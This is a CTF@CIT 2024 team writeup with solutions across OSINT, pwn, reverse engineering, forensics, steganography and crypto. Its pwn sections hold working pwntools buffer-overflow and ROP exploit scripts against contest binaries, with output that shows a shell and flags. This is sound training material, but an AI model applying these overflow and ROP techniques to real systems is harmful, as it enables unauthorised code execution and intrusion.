CTF@CIT 2024 Writeup

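This contest was held from 2024/4/20 6:00 (JST) to 2024/4/22 4:00 (JST).
I took part with a team again this time. We scored 3690 points and placed 66th out of 553 teams.
I am writing up the challenges I solved myself.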

Welcome to the first CTF@CIT (Welcome!)

The flag was written in the challenge description.

CIT{F1rst_Fl4g}

Discord (Welcome!)

After joining the Discord, I looked at the topic of the #ctf-info channel, where the flag was written.

CIT{y0u_4r3_1n_th3_d1sc0rd_y1p33}

Lost Flag (Misc)

Viewing the HTML source of the challenges page showed the following element.

<p style="color:white;">CIT{Y0U_H4V3_3Y3S!}</p>

CIT{Y0U_H4V3_3Y3S!}

Robots (OSINT)

Accessing https://ctf.cyber-cit.club/robots.txt showed the following.

User-agent: *
Disallow: /admin
CIT{1m_4_r0b0t}

CIT{1m_4_r0b0t}

I'm as cold as a wise man (OSINT)

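I cropped the photo to its upper part and ran an image search. This turned up an image in which the building on the left appeared to match, so I looked at the page it came from.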

https://www.coldfootcamp.com/eat

Looking at that area in Google Maps, the street name is as follows.

Coldfoot Rd (Coldfoot Road)

CIT{coldfoot}

ezpz (Pwn)

Decompile with Ghidra.

undefined8 main(void)

{
  int iVar1;
  time_t tVar2;
  char local_58 [72];
  ulong local_10;
  
  tVar2 = time((time_t *)0x0);
  srand((uint)tVar2);
  iVar1 = rand();
  local_10 = (ulong)(long)iVar1 % 5;
  setbuf(stdout,(char *)0x0);
  setbuf(stdin,(char *)0x0);
  setbuf(stderr,(char *)0x0);
  puts("\x1b[32m~ authored by nop.so (https://nop.so/) ~\x1b[0m\n\n");
  puts(*(char **)(pwn_pep_talk + local_10 * 8));
  puts("\n");
  puts("i\'m so tired of pwning and pwning all these insecure binaries.");
  puts("could you write me something to put the pep back in my step so");
  puts("I can pop some shells and make nop.so proud?");
  gets(local_58);
  puts("\nthank you. I will cherish this.\n");
  if (local_10 == 0xffffffffffffffff) {
    system("/bin/sh");
  }
  return 0;
}

A buffer overflow only needs to overwrite local_10 with 0xffffffffffffffff.

#!/usr/bin/env python3
from pwn import *

if len(sys.argv) == 1:
    p = remote('165.227.103.166', 6002)
else:
    p = process('./ezpz')

# local_58 is 72 bytes long and local_10 follows it directly (0x58 - 0x10 = 72)
payload = b'A' * 72
payload += p64(0xffffffffffffffff)

data = p.recvuntil(b'?\n').decode().rstrip()
print(data)
print(payload)
p.sendline(payload)
p.interactive()

The result of running it is as follows.

[+] Opening connection to 165.227.103.166 on port 6002: Done
~ authored by nop.so (https://nop.so/) ~


"to pwn or not to pwn. that is the question."


i'm so tired of pwning and pwning all these insecure binaries.
could you write me something to put the pep back in my step so
I can pop some shells and make nop.so proud?
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\xff\xff\xff\xff\xff\xff\xff\xff'
[*] Switching to interactive mode

thank you. I will cherish this.

$ ls
flag.txt
run
$ cat flag.txt
CIT{pr0bably_t00_3azy_4_U_9920int3oksalfqFoi3b3ofiql7}

CIT{pr0bably_t00_3azy_4_U_9920int3oksalfqFoi3b3ofiql7}

ret2monke (Pwn)

Decompile with Ghidra.

undefined8 main(void)

{
  char local_78 [112];
  
  setbuf(stdout,(char *)0x0);
  setbuf(stdin,(char *)0x0);
  setbuf(stderr,(char *)0x0);
  puts("\x1b[32m~ authored by nop.so (https://nop.so/) ~\x1b[0m\n\n");
  puts("in today\'s society, is there not joy to be found in the simpler things?");
  gets(local_78);
  return 0x13;
}

void monke(void)

{
  undefined8 local_118;
  undefined8 local_110;
  undefined8 local_108;
  undefined8 local_100;
  undefined8 local_f8;
  undefined8 local_f0;
  undefined8 local_e8;
  undefined8 local_e0;
  undefined8 local_d8;
  undefined8 local_d0;
  undefined8 local_c8;
  undefined8 local_c0;
  undefined8 local_b8;
  undefined8 local_b0;
  undefined8 local_a8;
  undefined8 local_a0;
  undefined8 local_98;
  undefined8 local_90;
  undefined8 local_88;
  undefined8 local_80;
  undefined8 local_78;
  undefined8 local_70;
  undefined8 local_68;
  undefined8 local_60;
  undefined8 local_58;
  undefined8 local_50;
  undefined8 local_48;
  undefined8 local_40;
  undefined8 local_38;
  undefined8 local_30;
  undefined8 local_28;
  undefined8 local_20;
  FILE *local_10;
  
  local_118 = 0;
  local_110 = 0;
  local_108 = 0;
  local_100 = 0;
  local_f8 = 0;
  local_f0 = 0;
  local_e8 = 0;
  local_e0 = 0;
  local_d8 = 0;
  local_d0 = 0;
  local_c8 = 0;
  local_c0 = 0;
  local_b8 = 0;
  local_b0 = 0;
  local_a8 = 0;
  local_a0 = 0;
  local_98 = 0;
  local_90 = 0;
  local_88 = 0;
  local_80 = 0;
  local_78 = 0;
  local_70 = 0;
  local_68 = 0;
  local_60 = 0;
  local_58 = 0;
  local_50 = 0;
  local_48 = 0;
  local_40 = 0;
  local_38 = 0;
  local_30 = 0;
  local_28 = 0;
  local_20 = 0;
  local_10 = fopen("./flag.txt","r");
  if (local_10 == (FILE *)0x0) {
    puts("internal error - contact @nop.so on discord");
                    /* WARNING: Subroutine does not return */
    exit(-1);
  }
  fgets((char *)&local_118,0x100,local_10);
  puts((char *)&local_118);
  fclose(local_10);
  return;
}

A buffer overflow only needs to get the monke function called.

$ ROPgadget --binary ret2monke | grep ": ret" 
0x000000000040101a : ret
0x0000000000401042 : ret 0x2f
0x0000000000401022 : retf 0x2f

#!/usr/bin/env python3
from pwn import *

if len(sys.argv) == 1:
    p = remote('165.227.103.166', 6001)
else:
    p = process('./ret2monke')

elf = ELF('./ret2monke')

ret_addr = 0x40101a
monke_addr = elf.symbols['monke']

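# local_78 starts 0x78 (120) bytes below main's return address
payload = b'A' * 120
# lone ret: 8-byte shift so monke is entered with ABI stack alignment
payload += p64(ret_addr)
payload += p64(monke_addr)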

data = p.recvuntil(b'?\n').decode().rstrip()
print(data)
print(payload)
p.sendline(payload)
data = p.recvuntil(b'\n').decode().rstrip()
print(data)

The result of running it is as follows.

[+] Opening connection to 165.227.103.166 on port 6001: Done
[*] '/media/sf_Shared/ret2monke'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
~ authored by nop.so (https://nop.so/) ~


in today's society, is there not joy to be found in the simpler things?
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x1a\x10@\x00\x00\x00\x00\x00\x86\x11@\x00\x00\x00\x00\x00'
CIT{pl3nty_0f_b4n4n4z_f0r_y0u!_992obAKLRsklnqf235io1lWK9io13}
[*] Closed connection to 165.227.103.166 port 6001

CIT{pl3nty_0f_b4n4n4z_f0r_y0u!_992obAKLRsklnqf235io1lWK9io13}

twostep (Pwn)

Decompile with Ghidra.

undefined8 main(void)

{
  int iVar1;
  time_t tVar2;
  char local_1b8 [432];
  
  tVar2 = time((time_t *)0x0);
  srand((uint)tVar2);
  setbuf(stdout,(char *)0x0);
  setbuf(stdin,(char *)0x0);
  setbuf(stderr,(char *)0x0);
  iVar1 = rand();
  arg1 = iVar1 % 0x45;
  iVar1 = rand();
  arg2 = iVar1 % 0x1a4;
  puts("\x1b[32m~ authored by nop.so (https://nop.so/) ~\x1b[0m\n\n");
  puts("omg hi! I\'ve been practicing my texas two-step, but I can\'t quite figure it out.");
  puts("every time I almost nail it, I stumble and mess it all up. This will not do.");
  puts("\n");
  puts("I have a meeting with an important niche internet microcelebrity in ");
  printf("%d HOURS and %d MINUTES, \nand ",(ulong)arg1,(ulong)arg2);
  puts("I can\'t afford to make a single mistake!");
  puts("\n");
  puts("have any advice for a stepper such as myself to lock in and fix my 2 step game?");
  gets(local_1b8);
  return 0x13;
}

void left2_foot_creep_FORBIDDEN(int param_1)

{
  undefined8 local_118;
  undefined8 local_110;
  undefined8 local_108;
  undefined8 local_100;
  undefined8 local_f8;
  undefined8 local_f0;
  undefined8 local_e8;
  undefined8 local_e0;
  undefined8 local_d8;
  undefined8 local_d0;
  undefined8 local_c8;
  undefined8 local_c0;
  undefined8 local_b8;
  undefined8 local_b0;
  undefined8 local_a8;
  undefined8 local_a0;
  undefined8 local_98;
  undefined8 local_90;
  undefined8 local_88;
  undefined8 local_80;
  undefined8 local_78;
  undefined8 local_70;
  undefined8 local_68;
  undefined8 local_60;
  undefined8 local_58;
  undefined8 local_50;
  undefined8 local_48;
  undefined8 local_40;
  undefined8 local_38;
  undefined8 local_30;
  undefined8 local_28;
  undefined8 local_20;
  FILE *local_10;
  
  if ((log == 1) && (param_1 == arg2)) {
    puts("magnificalicious. luh flaggington for you: \n");
    local_118 = 0;
    local_110 = 0;
    local_108 = 0;
    local_100 = 0;
    local_f8 = 0;
    local_f0 = 0;
    local_e8 = 0;
    local_e0 = 0;
    local_d8 = 0;
    local_d0 = 0;
    local_c8 = 0;
    local_c0 = 0;
    local_b8 = 0;
    local_b0 = 0;
    local_a8 = 0;
    local_a0 = 0;
    local_98 = 0;
    local_90 = 0;
    local_88 = 0;
    local_80 = 0;
    local_78 = 0;
    local_70 = 0;
    local_68 = 0;
    local_60 = 0;
    local_58 = 0;
    local_50 = 0;
    local_48 = 0;
    local_40 = 0;
    local_38 = 0;
    local_30 = 0;
    local_28 = 0;
    local_20 = 0;
    local_10 = fopen("./flag.txt","r");
    if (local_10 == (FILE *)0x0) {
      puts("internal error - contact @nop.so on discord");
                    /* WARNING: Subroutine does not return */
      exit(-1);
    }
    fgets((char *)&local_118,0x100,local_10);
    puts((char *)&local_118);
    fclose(local_10);
    return;
  }
  puts("not quite! teehee\n");
  puts("connection terminated.");
                    /* WARNING: Subroutine does not return */
  exit(0x1a4);
}

void right_foot_creep1(int param_1)

{
  if (param_1 != arg1) {
    puts("wrong! womp womp.");
                    /* WARNING: Subroutine does not return */
    exit(0x16);
  }
  log = 1;
  puts("almost. there.");
  return;
}

Use the buffer overflow to make the program do the following.

- Call right_foot_creep1 with arg1 as the argument.
- Call left2_foot_creep_FORBIDDEN with arg2 as the argument.

$ ROPgadget --binary twostep | grep ": ret"
0x000000000040101a : ret
0x000000000040149f : ret 0x1589
0x0000000000401042 : ret 0x2f
0x00000000004014ba : ret 0xfac1
0x00000000004011fa : ret 0xfffe
0x0000000000401022 : retf 0x2f
0x00000000004014c4 : retf 0xca69
0x0000000000401498 : retf 0xca6b

$ ROPgadget --binary twostep --re "pop rdi" 
Gadgets information
============================================================
0x00000000004011c5 : mov dl, byte ptr [rbp + 0x48] ; mov ebp, esp ; pop rdi ; ret
0x00000000004011c8 : mov ebp, esp ; pop rdi ; ret
0x00000000004011c7 : mov rbp, rsp ; pop rdi ; ret
0x00000000004011ca : pop rdi ; ret
0x00000000004011c6 : push rbp ; mov rbp, rsp ; pop rdi ; ret

Unique gadgets found: 5

#!/usr/bin/env python3
from pwn import *

if len(sys.argv) == 1:
    p = remote('165.227.103.166', 6003)
else:
    p = process('./twostep')

elf = ELF('./twostep')

ret_addr = 0x40101a
pop_rdi_addr = 0x4011ca
right_foot_creep1_addr = elf.symbols['right_foot_creep1']
left2_foot_creep_FORBIDDEN_addr = elf.symbols['left2_foot_creep_FORBIDDEN']

data = p.recvuntil(b'in \n').decode().rstrip()
print(data)
data = p.recvline().decode().rstrip()
print(data)
arg1 = int(data.split(' ')[0])
arg2 = int(data.split(' ')[3])

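# local_1b8 starts 0x1b8 (440) bytes below main's return address
payload = b'A' * 440
# lone ret: 8-byte shift so right_foot_creep1 is entered with ABI stack alignment
payload += p64(ret_addr)
# rdi = arg1, then right_foot_creep1 sets log = 1
payload += p64(pop_rdi_addr)
payload += p64(arg1)
payload += p64(right_foot_creep1_addr)
# rdi = arg2, then left2_foot_creep_FORBIDDEN prints the flag
payload += p64(pop_rdi_addr)
payload += p64(arg2)
payload += p64(left2_foot_creep_FORBIDDEN_addr)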

data = p.recvuntil(b'?\n').decode().rstrip()
print(data)
print(payload)
p.sendline(payload)

for _ in range(4):
    data = p.recvline().decode().rstrip()
    print(data)

The result of running it is as follows.

[+] Opening connection to 165.227.103.166 on port 6003: Done
[*] '/media/sf_Shared/twostep'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
~ authored by nop.so (https://nop.so/) ~


omg hi! I've been practicing my texas two-step, but I can't quite figure it out.
every time I almost nail it, I stumble and mess it all up. This will not do.


I have a meeting with an important niche internet microcelebrity in
5 HOURS and 279 MINUTES,
and I can't afford to make a single mistake!


have any advice for a stepper such as myself to lock in and fix my 2 step game?
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x1a\x10@\x00\x00\x00\x00\x00\xca\x11@\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\xcf\x11@\x00\x00\x00\x00\x00\xca\x11@\x00\x00\x00\x00\x00\x17\x01\x00\x00\x00\x00\x00\x00\x1a\x12@\x00\x00\x00\x00\x00'
almost. there.
magnificalicious. luh flaggington for you:

CIT{n0w_y3r_d4nc1n_thE_t3xas_2step_wbiw28qfe3gr1ddyBiq093kt310}
[*] Closed connection to 165.227.103.166 port 6003

CIT{n0w_y3r_d4nc1n_thE_t3xas_2step_wbiw28qfe3gr1ddyBiq093kt310}

Strung Along (Reverse Engineering)

Decompile with Ghidra.

void __static_initialization_and_destruction_0(void)

{
  long in_FS_OFFSET;
  allocator local_71;
  allocator *local_70;
  char *local_68;
  undefined *local_60;
  undefined *local_58;
  undefined *local_50;
  undefined *local_48;
  undefined *local_40;
  undefined *local_38;
  undefined *local_30;
  undefined *local_28;
  char *local_20 [2];
  
  local_20[0] = *(char **)(in_FS_OFFSET + 0x28);
  local_68 = "CI";
  local_60 = &DAT_00103084;
  local_58 = &DAT_00103087;
  local_50 = &DAT_0010308a;
  local_48 = &DAT_0010308d;
  local_40 = &DAT_00103090;
  local_38 = &DAT_00103093;
  local_30 = &DAT_00103096;
  local_28 = &DAT_00103099;
  local_70 = &local_71;
                    /* try { // try from 0010239f to 001023a3 has its CatchHandler @ 001023e6 */
  std::
  vector<std::__cxx11::basic_string<char,std::char_traits<char>,std::allocator<char>>,std::allocator<std::__cxx11::basic_string<char,std::char_traits<char>,std::allocator<char>>>>
  ::vector<char_const*const*,void>
            ((vector<std::__cxx11::basic_string<char,std::char_traits<char>,std::allocator<char>>,std::allocator<std::__cxx11::basic_string<char,std::char_traits<char>,std::allocator<char>>>>
              *)t[abi:cxx11],&local_68,local_20,&local_71);
  std::__new_allocator<std::__cxx11::basic_string<char,std::char_traits<char>,std::allocator<char>>>
  ::~__new_allocator((__new_allocator<std::__cxx11::basic_string<char,std::char_traits<char>,std::allocator<char>>>
                      *)&local_71);
  __cxa_atexit(std::
               vector<std::__cxx11::basic_string<char,std::char_traits<char>,std::allocator<char>>,std::allocator<std::__cxx11::basic_string<char,std::char_traits<char>,std::allocator<char>>>>
               ::~vector,t[abi:cxx11],&__dso_handle);
  if (local_20[0] != *(char **)(in_FS_OFFSET + 0x28)) {
                    /* WARNING: Subroutine does not return */
    __stack_chk_fail();
  }
  return;
}

                             DAT_00103081                                    XREF[2]:     __static_initialization_and_dest
                                                                                          __static_initialization_and_dest
        00103081 43              ??         43h    C
        00103082 49              ??         49h    I
        00103083 00              ??         00h
                             DAT_00103084                                    XREF[2]:     __static_initialization_and_dest
                                                                                          __static_initialization_and_dest
        00103084 54              ??         54h    T
        00103085 7b              ??         7Bh    {
        00103086 00              ??         00h
                             DAT_00103087                                    XREF[2]:     __static_initialization_and_dest
                                                                                          __static_initialization_and_dest
        00103087 50              ??         50h    P
        00103088 52              ??         52h    R
        00103089 00              ??         00h
                             DAT_0010308a                                    XREF[2]:     __static_initialization_and_dest
                                                                                          __static_initialization_and_dest
        0010308a 33              ??         33h    3
        0010308b 50              ??         50h    P
        0010308c 00              ??         00h
                             DAT_0010308d                                    XREF[2]:     __static_initialization_and_dest
                                                                                          __static_initialization_and_dest
        0010308d 34              ??         34h    4
        0010308e 52              ??         52h    R
        0010308f 00              ??         00h
                             DAT_00103090                                    XREF[2]:     __static_initialization_and_dest
                                                                                          __static_initialization_and_dest
        00103090 33              ??         33h    3
        00103091 34              ??         34h    4
        00103092 00              ??         00h
                             DAT_00103093                                    XREF[2]:     __static_initialization_and_dest
                                                                                          __static_initialization_and_dest
        00103093 50              ??         50h    P
        00103094 34              ??         34h    4
        00103095 00              ??         00h
                             DAT_00103096                                    XREF[2]:     __static_initialization_and_dest
                                                                                          __static_initialization_and_dest
        00103096 31              ??         31h    1
        00103097 4e              ??         4Eh    N
        00103098 00              ??         00h
                             DAT_00103099                                    XREF[2]:     __static_initialization_and_dest
                                                                                          __static_initialization_and_dest
        00103099 7d              ??         7Dh    }
        0010309a 00              ??         00h

CIT{PR3P4R34P41N}

I can't see it (Web)

$ curl http://138.197.33.187/ -v
*   Trying 138.197.33.187:80...
* Connected to 138.197.33.187 (138.197.33.187) port 80 (#0)
> GET / HTTP/1.1
> Host: 138.197.33.187
> User-Agent: curl/7.88.1
> Accept: */*
> 
< HTTP/1.1 200 OK
< Server: Werkzeug/2.2.2 Python/3.11.6
< Date: Sat, 20 Apr 2024 22:36:06 GMT
< Content-Type: text/html; charset=utf-8
< link: <style.css>; rel=stylesheet;
< Set-Cookie: request=Q0lUe24wV195b3VfQ0BuX3M1NV9tZX0=; Path=/
< Refresh: 2; url=https://www.youtube.com/watch?v=dQw4w9WgXcQ
< Content-Length: 0
< Connection: close
< 
* Closing connection 0

The request cookie is set to a base64 string.

$ echo Q0lUe24wV195b3VfQ0BuX3M1NV9tZX0= | base64 -d
CIT{n0W_you_C@n_s55_me}

CIT{n0W_you_C@n_s55_me}

Invoice (Forensics)

The invoice was sent to one of the sponsors, but the recipient in the PDF is blacked out. Copy and paste the masked part of the PDF.

TO: Sir Swaggy 1337 Information Security 22 Beehive Drive Freeport, Maine 04032 Phone: N/A
SHIP TO: Sir Swaggy 1337 Information Security 22 Beehive Drive Freeport, Maine

CIT{Sir_Swaggy}

Beep Boop (Forensics)

Write out the Morse code.

.. -. . ...- .. -.... ...-- .-. . -. .- -.. .. .--- ... -- ..-. .--- .--- .... -.- ..- ...-- .... -.- -. ...- ..-. ....- -.-- .--- -..- .... -... ....- -..- --- -.-- .-.. .....

Decoding it gives the following.

INEVI63RENADIJSMFJJHKU3HKNVF4YJXHB4XOYL5

$ echo INEVI63RENADIJSMFJJHKU3HKNVF4YJXHB4XOYL5 | base32 -d
CIT{q#@4&L*RuSgSj^a78ywa}

CIT{q#@4&L*RuSgSj^a78ywa}

Sniff Sniff (Forensics)

Filter on http. Packet No.12492 shows the following user information being sent by POST.

Form item: "uname" = "username"
Form item: "pass" = "Q0lUe2lKNUI5cyNsQXA2aUJOaTZKdFE4fQ=="

$ echo Q0lUe2lKNUI5cyNsQXA2aUJOaTZKdFE4fQ== | base64 -d
CIT{iJ5B9s#lAp6iBNi6JtQ8}

CIT{iJ5B9s#lAp6iBNi6JtQ8}

I LOVE PRIME! (Steganography)

$ exiftool meta-moon.jpg                
ExifTool Version Number         : 12.57
File Name                       : meta-moon.jpg
Directory                       : .
File Size                       : 24 kB
File Modification Date/Time     : 2024:04:20 06:40:54+09:00
File Access Date/Time           : 2024:04:20 06:42:24+09:00
File Inode Change Date/Time     : 2024:04:20 06:40:54+09:00
File Permissions                : -rwxrwx---
File Type                       : JPEG
File Type Extension             : jpg
MIME Type                       : image/jpeg
JFIF Version                    : 1.01
Resolution Unit                 : inches
X Resolution                    : 72
Y Resolution                    : 72
XMP Toolkit                     : Image::ExifTool 12.65
Description                     : CIT{meta_moon_prime_yummy}
Image Width                     : 1280
Image Height                    : 720
Encoding Process                : Baseline DCT, Huffman coding
Bits Per Sample                 : 8
Color Components                : 3
Y Cb Cr Sub Sampling            : YCbCr4:2:0 (2 2)
Image Size                      : 1280x720
Megapixels                      : 0.922

The flag was set in the Description field.

CIT{meta_moon_prime_yummy}

Intern (Steganography)

Opening the image in StegSolve and viewing Red plane 0 revealed the flag.

CIT{f1r3_th1s_1nt3rn}

Drop me a chug jug! (Steganography)

Opening the file in Audacity and viewing the spectrogram revealed the flag.

CIT{fOrtN1T3_ronnl369l}

The Art of the Beast (Steganography)

$ file the-art-of-the-beast.png 
the-art-of-the-beast.png: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 828x895, components 3

$ steghide extract -sf the-art-of-the-beast.png         
Enter passphrase: 
wrote extracted data to "misterbeast".

$ file misterbeast             
misterbeast: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=9e264a1d1bade455908e08feca50817b54fc544f, for GNU/Linux 3.2.0, stripped

$ strings misterbeast | grep CIT{               
you must love mister beast too!!! here's your flag: CIT{mist4_b34st}

CIT{mist4_b34st}

Very Based (Crypto)

$ echo SU5FVkk2WlhHSlJXT1MyTUdORFZFSkJFTEJSRzRLVDU= | base64 -d
INEVI6ZXGJRWOS2MGNDVEJBELBRG4KT5

$ echo INEVI6ZXGJRWOS2MGNDVEJBELBRG4KT5 | base32 -d            
CIT{72cgKL3GR$$Xbn*}

CIT{72cgKL3GR$$Xbn*}

Forgot My Password (Crypto)

Crack it with CrackStation.

verysecure

CIT{verysecure}

Chosen One (Crypto)

$ ./chosenone 
Enter string: 12345678
YW!)4:y2
$ ./chosenone 
Enter string: 987654321
M2y:4)!WY

It is probably a substitution cipher.

$ ./chosenone 
Enter string: !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
nKpxId]$C/c0eXHLYW!)4:y2MJS'Q^?;wRoEm+}5TU&<Nbh9F,#ta%1[B.ZOgsz`\_luP"f{Aqi3@V>kv8DG*(=6jr7-|~

So the mapping between plaintext and ciphertext is as follows.

Plaintext : !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
Ciphertext: nKpxId]$C/c0eXHLYW!)4:y2MJS'Q^?;wRoEm+}5TU&<Nbh9F,#ta%1[B.ZOgsz`\_luP"f{Aqi3@V>kv8DG*(=6jr7-|~

Decrypt the following ciphertext by looking it up in the mapping table.

Ciphertext: oTt74i!21/0;xLbk_Z3yPNdp|
Plaintext : CIT{5k38W*,@$0Npb[l7eM&#}

CIT{5k38W*,@$0Npb[l7eM&#}
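
The table lookup described above, written out as an added example (not part of the original writeup or the challenge): it rebuilds the mapping from the single printable-ASCII run, checks that it is a one-to-one, position-independent substitution, and inverts it. The function names are illustrative; the strings are copied from the session above.

```python
# Added example: rebuild and invert the substitution table from the single
# chosen-plaintext run shown in the writeup, then decode the challenge text.

# The probe typed into ./chosenone: every printable ASCII char, '!' to '~'.
PROBE = "".join(chr(c) for c in range(0x21, 0x7F))

# What the binary printed for PROBE (copied from the writeup).
PROBE_OUT = r'''nKpxId]$C/c0eXHLYW!)4:y2MJS'Q^?;wRoEm+}5TU&<Nbh9F,#ta%1[B.ZOgsz`\_luP"f{Aqi3@V>kv8DG*(=6jr7-|~'''

# Challenge ciphertext (copied from the writeup).
CHALLENGE_CT = "oTt74i!21/0;xLbk_Z3yPNdp|"


def build_tables(probe, probe_out):
    """Return (enc, dec) dicts; reject anything that is not a 1:1 mapping."""
    if len(probe) != len(probe_out):
        raise ValueError("output length differs from input: not per-character")
    enc, dec = {}, {}
    for p, c in zip(probe, probe_out):
        # setdefault keeps the first mapping seen, so a later conflict shows up
        if enc.setdefault(p, c) != c or dec.setdefault(c, p) != p:
            raise ValueError(f"conflicting mapping {p!r} -> {c!r}")
    return enc, dec


def translate(text, table):
    """Apply a table, failing loudly on characters the probe never covered."""
    missing = sorted(set(text) - set(table))
    if missing:
        raise KeyError(f"not covered by the probe: {missing}")
    return "".join(table[ch] for ch in text)


def fixed_points(enc):
    """Characters the cipher maps to themselves."""
    return sorted(p for p, c in enc.items() if p == c)


def is_position_independent(enc, samples):
    """True if each (plaintext, ciphertext) pair matches the one table."""
    return all(translate(pt, enc) == ct for pt, ct in samples)


if __name__ == "__main__":
    enc, dec = build_tables(PROBE, PROBE_OUT)
    # The two short runs from the writeup confirm the table does not depend
    # on position or message length.
    print(is_position_independent(enc, [("12345678", "YW!)4:y2"),
                                        ("987654321", "M2y:4)!WY")]))
    print(fixed_points(enc))
    print(translate(CHALLENGE_CT, dec))
```

Because the same table is applied at every position, one probe covering the whole alphabet is enough to decode any message, which is why a fixed substitution offers no protection once the transform can be queried.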